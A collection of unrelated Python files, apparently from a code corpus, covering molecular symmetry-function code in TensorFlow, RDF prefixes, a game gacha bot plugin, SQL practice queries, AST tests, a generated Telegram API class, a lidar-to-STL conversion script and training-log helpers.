multiples=[1, n_atoms, 1, n_rs]) # (n_samples, n_atoms, n_atoms, n_rs)
zeros = tf.zeros(tf.shape(pre_sum), dtype=tf.float32)
# Looping over all the possible elements in the system and extracting the relevant terms from the pre_sum term
pre_sum_terms = []
for i in range(n_elements):
element = tf.constant(elements_list[i], dtype=tf.int32)
equal_elements = tf.equal(neighb_atoms, element)
slice_presum = tf.where(equal_elements, pre_sum, zeros)
slice_sum = tf.reduce_sum(slice_presum, axis=[2])
pre_sum_terms.append(slice_sum)
# Concatenating the extracted terms.
final_term = tf.concat(pre_sum_terms, axis=-1, name="sum_rad")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_elements*n_rs])
# clean_final_term = tf.where(mask, final_term, tf.zeros(final_term.shape, dtype=tf.float32))
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term), dtype=tf.float32))
return clean_final_term
def sum_ang(pre_sumterm, Zs, element_pairs_list, angular_rs, theta_s):
"""
This function does the sum of the terms in the radial part of the symmetry function. Three body interactions where
the two neighbours are the same elements are summed together.
:param pre_sumterm: tf tensor of shape (n_samples, n_atoms, n_ang_rs * n_thetas)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param element_pairs_list: np array of shape (n_elementpairs, 2)
:param angular_rs: tf tensor of shape (n_ang_rs,)
:param theta_s: tf tensor of shape (n_thetas,)
:return: tf tensor of shape (n_samples, n_atoms, n_ang_rs * n_thetas * n_elementpairs)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_pairs = len(element_pairs_list)
n_rs = angular_rs.get_shape().as_list()[0]
n_thetas = theta_s.get_shape().as_list()[0]
# Making the pair matrix
Zs_exp_1 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=1), multiples=[1, n_atoms, 1]), axis=-1)
Zs_exp_2 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=-1), multiples=[1, 1, n_atoms]), axis=-1)
neighb_pairs = tf.concat([Zs_exp_1, Zs_exp_2], axis=-1) # (n_samples, n_atoms, n_atoms, 2)
# Cleaning up diagonal elements
zarray = np.zeros((n_atoms, n_atoms, 2))
for i in range(n_atoms):
zarray[i, i, :] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, 2)
zeros = tf.zeros(tf.shape(neighb_pairs), dtype=tf.int32)
clean_pairs = tf.where(where_eq_idx, zeros, neighb_pairs)
# Sorting the pairs in descending order so that for example pair [7, 1] is the same as [1, 7]
sorted_pairs, _ = tf.nn.top_k(clean_pairs, k=2, sorted=True) # (n_samples, n_atoms, n_atoms, 2)
# Preparing to clean the sorted pairs from where there will be self interactions in the three-body-terms
oarray = np.ones((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
oarray[i, j, k] = 0
# Make a bool tensor of the indices
where_self_int = tf.tile(tf.expand_dims(tf.convert_to_tensor(oarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms)
exp_self_int = tf.expand_dims(where_self_int, axis=-1) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
zeros_large = tf.zeros(tf.shape(pre_sumterm), dtype=tf.float32, name="zero_large")
presum_terms = []
with tf.name_scope("Extract"):
for i in range(n_pairs):
# Making a tensor where all the elements are the pair under consideration
pair = tf.constant(element_pairs_list[i], dtype=tf.int32)
expanded_pair = tf.tile(
tf.expand_dims(tf.expand_dims(tf.expand_dims(pair, axis=0), axis=0), axis=0),
multiples=[tf.shape(Zs)[0], n_atoms, n_atoms, 1], name="expand_pair") # (n_samples, n_atoms, n_atoms, 2)
# Comparing which neighbour pairs correspond to the pair under consideration
equal_pair_mix = tf.equal(expanded_pair, sorted_pairs)
equal_pair_split1, equal_pair_split2 = tf.split(equal_pair_mix, 2, axis=-1)
equal_pair = tf.tile(tf.expand_dims(tf.logical_and(equal_pair_split1, equal_pair_split2), axis=[1]),
multiples=[1, n_atoms, 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
# Removing the pairs where the same atom is present more than once
int_to_keep = tf.logical_and(equal_pair, exp_self_int)
exp_int_to_keep = tf.tile(int_to_keep, multiples=[1, 1, 1, 1, n_rs * n_thetas])
# Extracting the terms that correspond to the pair under consideration
slice_presum = tf.where(exp_int_to_keep, pre_sumterm, zeros_large, name="sl_pr_s")
slice_sum = 0.5 * tf.reduce_sum(slice_presum, axis=[2, 3], name="sum_ang")
presum_terms.append(slice_sum)
# Concatenating all of the terms corresponding to different pair neighbours
final_term = tf.concat(presum_terms, axis=-1, name="concat_presum")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_thetas * n_rs * n_pairs])
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term)))
return clean_final_term
def generate_parkhill_acsf(xyzs, Zs, elements, element_pairs, radial_cutoff, angular_cutoff,
radial_rs, angular_rs, theta_s, zeta, eta):
"""
This function generates the atom centred symmetry function as used in the Tensormol paper. Currently only tested for
single systems with many conformations. It requires the coordinates of all the atoms in each data sample, the atomic
charges for each atom (in the same order as the xyz), the overall elements and overall element pairs. Then it
requires the parameters for the ACSF that are used in the Tensormol paper: https://arxiv.org/pdf/1711.06385.pdf
:param xyzs: tensor of shape (n_samples, n_atoms, 3)
:param Zs: tensor of shape (n_samples, n_atoms)
:param elements: np.array of shape (n_elements,)
:param element_pairs: np.array of shape (n_elementpairs, 2)
:param radial_cutoff: scalar float
:param angular_cutoff: scalar float
:param radial_rs: np.array of shape (n_rad_rs,)
:param angular_rs: np.array of shape (n_ang_rs,)
:param theta_s: np.array of shape (n_thetas,)
:param zeta: scalar float
:param eta: scalar float
:return: a tf tensor of shape (n_samples, n_atoms, n_rad_rs * n_elements + n_ang_rs * n_thetas * n_elementpairs)
"""
with tf.name_scope("acsf_params"):
rad_cutoff = tf.constant(radial_cutoff, dtype=tf.float32)
ang_cutoff = tf.constant(angular_cutoff, dtype=tf.float32)
rad_rs = tf.constant(radial_rs, dtype=tf.float32)
ang_rs = tf.constant(angular_rs, dtype=tf.float32)
theta_s = tf.constant(theta_s, dtype=tf.float32)
zeta_tf = tf.constant(zeta, dtype=tf.float32)
eta_tf = tf.constant(eta, dtype=tf.float32)
## Calculating the radial part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Radial_part"):
pre_sum_rad = acsf_rad(xyzs, Zs, rad_cutoff, rad_rs, eta_tf) # (n_samples, n_atoms, n_atoms, n_rad_rs)
with tf.name_scope("Sum_rad"):
# Then summing based on the identity of the atoms interacting
rad_term = sum_rad(pre_sum_rad, Zs, elements, rad_rs) # (n_samples, n_atoms, n_rad_rs*n_elements)
## Calculating the angular part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Angular_part"):
pre_sum_ang = acsf_ang(xyzs, Zs, ang_cutoff, ang_rs, theta_s, zeta_tf, eta_tf) # (n_samples, n_atoms, n_atoms, n_atoms, n_thetas * n_ang_rs)
with tf.name_scope("Sum_ang"):
# Then doing the sum based on the neighbrouing pair identity
ang_term = sum_ang(pre_sum_ang, Zs, element_pairs, ang_rs, theta_s) # (n_samples, n_atoms, n_thetas * n_ang_rs*n_elementpairs)
with tf.name_scope("ACSF"):
acsf = tf.concat([rad_term, ang_term], axis=-1, name="acsf") # (n_samples, n_atoms, n_rad_rs*n_elements + n_thetas * n_ang_rs*n_elementpairs)
return acsf
|
python
|
# ro_prefixes.py
"""
Central list of prefixes commonly used with ROs
extended to support ro model updates and extensions for earth science (01/2017) by Raul Palma
"""
__authors__ = "Graham Klyne ([email protected]), Raul Palma"
__copyright__ = "Copyright 2011-2013, University of Oxford"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
prefixes = (
[ ("rdf", "http://www.w3.org/1999/02/22-rdf-syntax-ns#")
, ("rdfs", "http://www.w3.org/2000/01/rdf-schema#")
, ("owl", "http://www.w3.org/2002/07/owl#")
, ("xml", "http://www.w3.org/XML/1998/namespace")
, ("xsd", "http://www.w3.org/2001/XMLSchema#")
, ("rdfg", "http://www.w3.org/2004/03/trix/rdfg-1/")
, ("ro", "http://purl.org/wf4ever/ro#")
, ("roevo", "http://purl.org/wf4ever/roevo#")
, ("roterms", "http://purl.org/wf4ever/roterms#")
, ("wfprov", "http://purl.org/wf4ever/wfprov#")
, ("wfdesc", "http://purl.org/wf4ever/wfdesc#")
, ("wf4ever", "http://purl.org/wf4ever/wf4ever#")
, ("ore", "http://www.openarchives.org/ore/terms/")
, ("ao", "http://purl.org/ao/")
, ("dcterms", "http://purl.org/dc/terms/")
, ("dc", "http://purl.org/dc/elements/1.1/")
, ("foaf", "http://xmlns.com/foaf/0.1/")
, ("minim", "http://purl.org/minim/minim#")
, ("result", "http://www.w3.org/2001/sw/DataAccess/tests/result-set#")
, ("roes", "http://w3id.org/ro/earth-science#")
, ("oa", "http://www.w3.org/ns/oa#")
, ("pav", "http://purl.org/pav/")
, ("swrc", "http://swrc.ontoware.org/ontology#")
, ("cito", "http://purl.org/spar/cito/")
, ("dbo", "http://dbpedia.org/ontology/")
, ("ov", "http://open.vocab.org/terms/")
, ("bibo", "http://purl.org/ontology/bibo/")
, ("prov", "http://www.w3.org/ns/prov#")
, ("geo", "http://www.opengis.net/ont/geosparql#")
, ("sf", "http://www.opengis.net/ont/sf#")
, ("gml", "http://www.opengis.net/ont/gml#")
, ("odrs", "http://schema.theodi.org/odrs#")
, ("cc", "http://creativecommons.org/ns#")
, ("odrl", "http://www.w3.org/ns/odrl/2/")
, ("geo-wgs84", "http://www.w3.org/2003/01/geo/wgs84_pos#")
, ("voag", "http://voag.linkedmodel.org/schema/voag#")
# Workaround hack until Minim prefix handling is sorted out
, ("chembox", "http://dbpedia.org/resource/Template:Chembox:")
])
extra_prefixes = (
[ ("", "http://example.org/")
])
def make_turtle_prefixes(extra_prefixes=[]):
return"\n".join([ "@prefix %s: <%s> ."%p for p in prefixes+extra_prefixes ]) + "\n\n"
def make_sparql_prefixes(extra_prefixes=[]):
return"\n".join([ "PREFIX %s: <%s>"%p for p in prefixes+extra_prefixes ]) + "\n\n"
turtle_prefixstr = make_turtle_prefixes(extra_prefixes)
sparql_prefixstr = make_sparql_prefixes(extra_prefixes)
prefix_dict = dict(prefixes)
# from rocommand.ro_prefixes import prefixes, prefix_dict, make_turtle_prefixes, make_sparql_prefixes, sparql_prefixstr
|
python
|
import random
from lxml import etree
from typing import List
from PIL import ImageDraw
from nonebot.log import logger
try:
import ujson as json
except ModuleNotFoundError:
import json
from .base_handle import BaseHandle, BaseData
from ..config import draw_config
from ..util import remove_prohibited_str, cn2py, load_font
from ..create_img import CreateImg
class FgoData(BaseData):
pass
class FgoChar(FgoData):
pass
class FgoCard(FgoData):
pass
class FgoHandle(BaseHandle[FgoData]):
def __init__(self):
super().__init__("fgo", "命运-冠位指定")
self.data_files.append("fgo_card.json")
self.max_star = 5
self.config = draw_config.fgo
self.ALL_CHAR: List[FgoChar] = []
self.ALL_CARD: List[FgoCard] = []
def get_card(self, mode: int = 1) -> FgoData:
if mode == 1:
star = self.get_star(
[8, 7, 6, 5, 4, 3],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
self.config.FGO_CARD_FIVE_P,
self.config.FGO_CARD_FOUR_P,
self.config.FGO_CARD_THREE_P,
],
)
elif mode == 2:
star = self.get_star(
[5, 4], [self.config.FGO_CARD_FIVE_P, self.config.FGO_CARD_FOUR_P]
)
else:
star = self.get_star(
[8, 7, 6],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
],
)
if star > 5:
star -= 3
chars = [x for x in self.ALL_CHAR if x.star == star and not x.limited]
else:
chars = [x for x in self.ALL_CARD if x.star == star and not x.limited]
return random.choice(chars)
def get_cards(self, count: int, **kwargs) -> List[FgoData]:
card_list = [] # 获取所有角色
servant_count = 0 # 保底计算
card_count = 0 # 保底计算
for _ in range(count):
servant_count += 1
card_count += 1
if card_count == 9: # 四星卡片保底
mode = 2
elif servant_count == 10: # 三星从者保底
mode = 3
else: # 普通抽
mode = 1
card = self.get_card(mode)
if isinstance(card, FgoCard) and card.star > self.max_star - 2:
card_count = 0
if isinstance(card, FgoChar):
servant_count = 0
card_list.append(card)
return card_list
def generate_card_img(self, card: FgoData) -> CreateImg:
sep_w = 5
sep_t = 5
sep_b = 20
w = 128
h = 140
bg = CreateImg(w + sep_w * 2, h + sep_t + sep_b)
img_path = str(self.img_path / f"{cn2py(card.name)}.png")
img = CreateImg(w, h, background=img_path)
bg.paste(img, (sep_w, sep_t), alpha=True)
# 加名字
text = card.name[:6] + "..." if len(card.name) > 7 else card.name
font = load_font(fontsize=16)
text_w, text_h = font.getsize(text)
draw = ImageDraw.Draw(bg.markImg)
draw.text(
(sep_w + (w - text_w) / 2, h + sep_t + (sep_b - text_h) / 2),
text,
font=font,
fill="gray",
)
return bg
def _init_data(self):
self.ALL_CHAR = [
FgoChar(
name=value["名称"],
star=int(value["星级"]),
limited=True
if not ("圣晶石召唤" in value["入手方式"] or "圣晶石召唤(Story卡池)" in value["入手方式"])
else False,
)
for value in self.load_data().values()
]
self.ALL_CARD = [
FgoCard(name=value["名称"], star=int(value["星级"]), limited=False)
for value in self.load_data("fgo_card.json").values()
]
async def _update_info(self):
# fgo.json
fgo_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/servant/ajax?card=&wd=&ids=&sort=12777&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn} page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["charid"],
"头像": x["icon"],
"名称": remove_prohibited_str(x["name"]),
"职阶": x["classes"],
"星级": int(x["star"]),
"hp": x["lvmax4hp"],
"atk": x["lvmax4atk"],
"card_quick": x["cardquick"],
"card_arts": x["cardarts"],
"card_buster": x["cardbuster"],
"宝具": x["tprop"],
}
fgo_info[name] = member_dict
# 更新额外信息
for key in fgo_info.keys():
url = f'http://fgo.vgtime.com/servant/{fgo_info[key]["id"]}'
result = await self.get_url(url)
if not result:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
continue
try:
dom = etree.HTML(result, etree.HTMLParser())
obtain = dom.xpath(
"//table[contains(string(.),'入手方式')]/tr[8]/td[3]/text()"
)[0]
obtain = str(obtain).strip()
if "限时活动免费获取 活动结束后无法获得" in obtain:
obtain = ["活动获取"]
elif "非限时UP无法获得" in obtain:
obtain = ["限时召唤"]
else:
if "&" in obtain:
obtain = obtain.split("&")
else:
obtain = obtain.split(" ")
obtain = [s.strip() for s in obtain if s.strip()]
fgo_info[key]["入手方式"] = obtain
except IndexError:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
self.dump_data(fgo_info)
logger.info(f"{self.game_name_cn} 更新成功")
# fgo_card.json
fgo_card_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/equipment/ajax?wd=&ids=&sort=12958&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn}卡牌 page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["equipid"],
"头像": x["icon"],
"名称": name,
"星级": int(x["star"]),
"hp": x["lvmax_hp"],
"atk": x["lvmax_atk"],
"skill_e": str(x["skill_e"]).split("<br />")[:-1],
}
fgo_card_info[name] = member_dict
self.dump_data(fgo_card_info, "fgo_card.json")
logger.info(f"{self.game_name_cn} 卡牌更新成功")
# 下载头像
for value in fgo_info.values():
await self.download_img(value["头像"], value["名称"])
for value in fgo_card_info.values():
await self.download_img(value["头像"], value["名称"])
|
python
|
"""Queries to answer following questions"""
# How many total Characters are there?
QUERY_1 = '''SELECT COUNT(*)
FROM charactercreator_character;'''
# How many of each specific subclass?
QUERY_2 = '''SELECT (
SELECT COUNT(*)
FROM charactercreator_thief
) AS thief_class,
(
SELECT COUNT(*)
FROM charactercreator_cleric
) AS cleric_class,
(
SELECT COUNT(*)
FROM charactercreator_fighter
) AS fighter_class,
(
SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NOT NULL
) AS Necromancer_class,
(SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NULL
) AS Mage_class'''
# How many total items?
QUERY_3 = '''SELECT COUNT(*)
FROM armory_item;'''
# How many of the items are weapons? How many are not?
QUERY_4 = '''SELECT COUNT(*)
FROM armory_weapon'''
QUERY_5 = '''SELECT COUNT(*)
FROM armory_item
LEFT JOIN armory_weapon
on item_id = item_ptr_id
WHERE item_ptr_id IS NULL;'''
# How many items does each character have? (return first 20 rows)
# How many weapons does each character have? (return first 20 rows)
# On average, how many items does each character have?
# On average, how many weapons does each character have?
|
python
|
from astutils import ast
def test_terminal():
value = 'a'
t = ast.Terminal(value)
r = repr(t)
assert r == "Terminal('a', 'terminal')", r
r = str(t)
assert r == 'a', r
r = len(t)
assert r == 1, r
r = t.flatten()
assert r == value, r
def test_hash():
# different AST node instances should
# have different hash
#
# terminals
value = 'foo'
a = ast.Terminal(value)
b = ast.Terminal(value)
assert hash(a) != hash(b)
# operators
op = 'bar'
a = ast.Operator(op)
b = ast.Operator(op)
assert hash(a) != hash(b)
def test_eq():
value = 'a'
t = ast.Terminal(value)
p = ast.Terminal(value)
assert t == p, (t, p)
p = ast.Terminal('b')
assert t != p, (t, p)
p = ast.Terminal(value, 'number')
assert t != p, (t, p)
p = 54
assert t != p, (t, p)
def test_operator():
a = ast.Terminal('a')
b = ast.Terminal('b')
op = '+'
operands = [a, b] # 'a', 'b' fail due to `str`
t = ast.Operator(op, *operands)
r = repr(t)
r_ = (
"Operator('+', "
"Terminal('a', 'terminal'), "
"Terminal('b', 'terminal'))")
assert r == r_, r
r = str(t)
assert r == '(+ a b)', r
r = len(t)
assert r == 3, r
r = t.flatten()
assert r == '( + a, b )', r
|
python
|
num1 = 111
num2 = 222
num3 = 3333333333
num3 = 333
num4 = 44444
|
python
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from ..base_object import BaseObject
class ToggleSupergroupIsAllHistoryAvailable(BaseObject):
"""
Toggles whether the message history of a supergroup is available to new members; requires can_change_info administrator right
:param supergroup_id: The identifier of the supergroup
:type supergroup_id: :class:`int`
:param is_all_history_available: The new value of is_all_history_available
:type is_all_history_available: :class:`bool`
"""
ID: str = Field("toggleSupergroupIsAllHistoryAvailable", alias="@type")
supergroup_id: int
is_all_history_available: bool
@staticmethod
def read(q: dict) -> ToggleSupergroupIsAllHistoryAvailable:
return ToggleSupergroupIsAllHistoryAvailable.construct(**q)
|
python
|
import os
import sys
import zipfile
import asc_parse
import wget
import multiprocessing
import urllib.request as request
from contextlib import closing
import argparse
import shutil
import glob
# A decimal value that will decrease the output file size as it increases
REDUCE_BY = 1.0
# A decimal value that will make artificially make things taller as it increases
VERTICAL_SCALE = 1.0
# A decimal value that sets the base height of the model
BASE_HEIGHT = 0.0
# Disable this option if you want to generate a seperate DEM/STL for each LAS tile.
MERGE_LAS = False
# Generate 3D models
GENERATE_STLS = True
# Delete LAS Directory when finished
DELETE_LAS = False
# Enabling this option will generate .prj files for each generated .asc file. This requires blast2dem,
# a closed source utility that is part of lastools. If you enable this option, lastools will be automatically
# downloaded an unzipped, however, the output may not be used for commercial purposes unless you purchase
# a lastools license. This option is only necessary if you plan on using the DEMto3D plugin that is part of
# QGIS. More information about lastools licensing is available here:
# https://lastools.github.io/LICENSE.txt
QGIS_COMPATIBLE_DEM = False
if getattr(sys, 'frozen', False):
APPLICATION_PATH = os.path.dirname(sys.executable)
elif __file__:
APPLICATION_PATH = os.path.dirname(__file__)
GRID_EXE = os.path.join(APPLICATION_PATH, "GridSurfaceCreate64.exe")
D2A_EXE = os.path.join(APPLICATION_PATH, "DTM2ASCII.exe")
LASZIP_EXE = os.path.join(APPLICATION_PATH, "laszip-cli.exe")
LASTOOLS_URL = "http://lastools.github.io/download/LAStools.zip"
BLAST2DEM_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\blast2dem.exe")
LAS2LAS_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\las2las.exe")
# lastools isn't completely free/open source, so we can't distribute it with the program.
def install_lastools():
file_name = wget.filename_from_url(LASTOOLS_URL)
if not os.path.exists(BLAST2DEM_EXE):
print('lastools missing, downloading...')
with closing(request.urlopen(LASTOOLS_URL)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("")
os.remove(file_name)
def get_file_from_url(url, file_name):
# This is a pattern you'll see several times. I don't want to have to
# redo the whole process if it fails along the way.
if os.path.exists(file_name):
print(f"{file_name} already downloaded, skipping...")
return
with closing(request.urlopen(url)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
print(f"Downloaded {url}")
def unzip_to_las(file_name, las_name):
print(f'Unzipping {file_name}')
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("LAS")
def generate_dem_from_las(las_name, dem_name, filter: float = None, reduce_by: float = 1.0):
global GRID_EXE
if filter:
GRID_EXE += f' /spike:{filter}'
if os.path.exists(dem_name):
print(f'{dem_name} already exists, skipping...')
return
print(f'Generating {dem_name}')
os.system(f'{GRID_EXE} {dem_name} {reduce_by} M M 0 0 0 0 {las_name}')
def unzip_laz_file(laz_name, las_name):
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
print(f'Unzipping {laz_name} to {las_name}')
os.system(f'{LASZIP_EXE} -i {laz_name} -o {las_name}')
def main():
global VERTICAL_SCALE
global BASE_HEIGHT
global REDUCE_BY
global MERGE_LAS
global GENERATE_STLS
global DELETE_LAS
global QGIS_COMPATIBLE_DEM
global GRID_EXE
parser = argparse.ArgumentParser(description='A utility for automatically generating 3D printable STLs from USGS lidar scans.')
# Just in case the user doesn't pass in the file name, assume it's what the USGS names it.
parser.add_argument('--input', '-i', type=str, default='downloadlist.txt', help='The name of the file containing the URLs of all of the lidar scan data.')
parser.add_argument('--reduce', '-r', type=float, default=REDUCE_BY, help='A decimal value that will decrease the output file size as it increases. The default value is 1.0')
parser.add_argument('--vscale', '-v', type=float, default=VERTICAL_SCALE, help='A decimal value that will make artificially make things taller as it increases. The default value is 1.0')
parser.add_argument('--base', '-b', type=float, default=BASE_HEIGHT, help='A decimal value that sets the base height of the model. The default value is 0.0')
parser.add_argument('--merge', '-m', action='store_true', help='Using this flag will merge all of the point clouds into one file before converting into a DEM.')
parser.add_argument('--no_stl', '-s', action='store_false', help='Using this flag will disable STL generation.')
parser.add_argument('--cleanup', '-c', action='store_true', help='Using this flag will cause the program to automatically delete the unzipped point cloud files after running.')
parser.add_argument('--filter', '-f', type=float, default=False, help='A percent value (0-100, for the slope of the points being smoothed) that will enable the spike smoothing option. This is good if you have points that are floating way up above the model and causing spikes in your final model.')
parser.add_argument('--prj', '-p', action='store_true', help='Using this flag will cause the program to automatically download and use lastools to generate projection files for the elevation models. This is important if you want to generate the STLs yourself in QGIS, but it means you\'ll have to be mindful of lastool\'s license limitations. More info on lastool\'s website.')
parser.add_argument('--external_files', '-e', action='store_true', default=False, help='Using this flag will grab las/laz files from the LAS directory instead of downloading them from an input list.')
#parser.add_argument('--help', '-h', action='help')
args = parser.parse_args()
VERTICAL_SCALE = args.vscale
BASE_HEIGHT = args.base
REDUCE_BY = args.reduce
MERGE_LAS = args.merge
GENERATE_STLS = args.no_stl
DELETE_LAS = args.cleanup
QGIS_COMPATIBLE_DEM=args.prj
if args.filter:
GRID_EXE += f' /spike:{args.filter}'
if not args.external_files:
# For each tile in the USGS dataset, download the zip
f = open(args.input)
list_of_urls = []
list_of_zip = []
for line in f:
if not line.rstrip('\n').endswith('.zip'):
continue
print(line := line.rstrip('\n'))
file_name = wget.filename_from_url(line)
list_of_zip.append(file_name)
list_of_urls.append(line)
# This is the definitive list of all file names for each phase of the pipeline from here out.
list_of_files = [x.removesuffix('.zip') for x in list_of_zip]
list_of_las = [f'LAS\\{x}.las' for x in list_of_files]
if not os.path.exists('LAS'):
os.mkdir('LAS')
with multiprocessing.Pool(16) as p:
p.starmap(get_file_from_url, zip(list_of_urls, list_of_zip))
# Unzip each zip file that was downloaded
p.starmap(unzip_to_las, zip(list_of_zip, list_of_las))
list_of_laz = list(glob.glob('LAS\\*.laz'))
if list_of_laz:
print("LAZ files detected, unzipping...")
with multiprocessing.Pool() as p:
p.starmap(unzip_laz_file, zip(list_of_laz, [x.removesuffix('.laz') + '.las' for x in list_of_laz]))
list_of_las = list(glob.glob('LAS\\*.las'))
list_of_files = [os.path.basename(x).removesuffix('.las') for x in list_of_las]
if MERGE_LAS:
list_of_files = [list_of_files[0]]
# Prep the list of DTM files
list_of_dtm = [f'DTM\\{x}.dtm' for x in list_of_files]
if not os.path.exists('DTM'):
os.mkdir('DTM')
print("\nGenerating .dtm files...\n")
# If necessary, make sure all las files get combined into one DTM
if MERGE_LAS:
os.system(f'{GRID_EXE} {list_of_dtm[0]} {REDUCE_BY} M M 0 0 0 0 LAS\\*.las')
else:
with multiprocessing.Pool() as p:
p.starmap(generate_dem_from_las, zip(list_of_las, list_of_dtm, [args.filter] * len(list_of_las), [REDUCE_BY] * len(list_of_las)))
if not os.path.exists('ASC'):
os.mkdir('ASC')
list_of_asc = [f'ASC\\{x}.asc' for x in list_of_files]
# Convert all the dtm files into asc files
print("\nGenerating .asc files...\n")
for d, a in zip(list_of_dtm, list_of_asc):
print(a)
if os.path.exists(a):
pass
os.system(f'{D2A_EXE} /raster {d} {a}')
if QGIS_COMPATIBLE_DEM:
install_lastools()
list_of_prj = [f'LAS\\{x}.prj' for x in list_of_files]
# Use lastools to generate the prj file that QGIS will need
for l, p in zip(list_of_las, list_of_prj):
os.system(f'{BLAST2DEM_EXE} -i {l} -oasc')
shutil.copy(p, 'ASC')
if GENERATE_STLS:
asc_parse.gen_stls_from_ascs(
list_of_asc=list_of_asc,
list_of_files=list_of_files,
scale_adjustment=REDUCE_BY,
vscale=VERTICAL_SCALE,
base=BASE_HEIGHT,
)
# Delete the directories used for the intermediate steps
print("Cleaning up...")
if DELETE_LAS:
shutil.rmtree('LAS')
shutil.rmtree('DTM')
if __name__ == "__main__":
if sys.platform.startswith('win'):
# On Windows calling this function is necessary.
multiprocessing.freeze_support()
main()
|
python
|
import numpy as np
import pandas as pd
import os
def prm_to_df(prm):
"""Convert prm to a pandas DataFrame"""
values = list(prm.values())
columns = list(prm.keys())
df_prm = pd.DataFrame(columns=columns)
for value, column in zip(values, columns):
df_prm[column] = [value]
return (df_prm)
def save_on_disk(prm):
"""Saving prm on a specific .csv file"""
df_prm = prm_to_df(prm)
info = '/training_results/' + prm['info']
df_prm.to_csv(prm['output_dir'] + info + '/prm.csv')
def add_columns_to_df(df, columns):
"""Create new columns in a dataframe"""
for column in columns:
df[column] = np.nan
return (df)
def update_training_record(prm):
"""Update a csv file containing all previous info about training"""
# New prm
new_prm = prm_to_df(prm)
# Add new columns
columns = ['RMSE_UV_mean', 'RMSE_UV_std', 'RMSE_UV_min', 'RMSE_UV_max',
'RMSE_UVW_mean', 'RMSE_UVW_std', 'RMSE_UVW_min', 'RMSE_UVW_max',
'RMSE_U_mean', 'RMSE_U_std', 'RMSE_U_min', 'RMSE_U_max',
'RMSE_V_mean', 'RMSE_V_std', 'RMSE_V_min', 'RMSE_V_max',
'RMSE_W_mean', 'RMSE_W_std', 'RMSE_W_min', 'RMSE_W_max',
'corr_coeff_UV_mean', 'corr_coeff_UV_std', 'corr_coeff_UV_min', 'corr_coeff_UV_max',
'corr_coeff_UVW_mean', 'corr_coeff_UV_std', 'corr_coeff_UVW_min', 'corr_coeff_UV_max',
'corr_coeff_U_mean', 'corr_coeff_U_std', 'corr_coeff_U_min', 'corr_coeff_U_max',
'corr_coeff_V_mean', 'corr_coeff_V_std', 'corr_coeff_V_min', 'corr_coeff_V_max',
'corr_coeff_W_mean', 'corr_coeff_W_std', 'corr_coeff_W_min', 'corr_coeff_W_max',
'bias_UV_mean', 'bias_UV_std', 'bias_UV_min', 'bias_UV_max',
'bias_UVW_mean', 'bias_UVW_std', 'bias_UVW_min', 'bias_UVW_max',
'bias_U_mean', 'bias_U_std', 'bias_U_min', 'bias_U_max',
'bias_V_mean', 'bias_V_std', 'bias_V_min', 'bias_V_max',
'bias_W_mean', 'bias_W_std', 'bias_W_min', 'bias_W_max']
